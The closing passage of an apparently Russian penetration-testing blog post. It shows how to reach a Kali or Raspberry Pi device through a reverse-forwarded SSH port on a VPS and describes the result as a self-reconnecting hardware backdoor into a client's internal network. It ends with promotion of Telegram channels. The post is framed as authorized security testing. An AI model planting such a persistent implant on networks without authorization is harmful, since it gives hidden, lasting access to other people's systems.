  <p id="vCQl">Когда у вас прокинутся порты, заходим на VPS и подключаемся к кали:</p>
  <pre id="6Zaw">sudo ssh user@localhost -p 22222</pre>
  <figure id="8yrs" class="m_custom">
    <img src="https://img3.teletype.in/files/26/06/26068952-0039-48c4-9738-5682ae871c97.png" width="698" />
    <figcaption>Команда whoami в контексте удаленной машины</figcaption>
  </figure>
  <p id="3J21">Если в какой то момент вы не можете получить доступ к кали или малинке, на VPS просто убейте процесс с подключением к ней. Через пару мгновений вы увидите, что порт 22222 снова открылся.</p>
  <p id="fdUE">Вот так просто и быстро.</p>
  <p id="5OEh">На выходе вы получаете аппаратный бекдор к которому вы будете подключаться из любого уголка мира, который будет смотреть во внутреннюю сеть Заказчика и интернет и будет автоматически восстанавливать соединение при разрыве.</p>
  <p id="HZxO"><em>А еще я хочу порекомендовать вам канал по кибербезу, поэтому ловите ссылку  – <a href="https://t.me/+jFZmgIv1tCRjNmEy" target="_blank">Пакет Безопасности</a>. Там автор регулярно рассказывает об актуальных новостях из мира ИБ, обозревает полезные инструменты для безопасников и делится своим мнением.</em></p>
  <p id="DwRK"><strong>Еще больше интересных статей в моем ТГ канале: <a href="https://t.me/pro_pentest" target="_blank">https://t.me/pro_pentest</a></strong></p>

]]></content:encoded></item></channel></rss>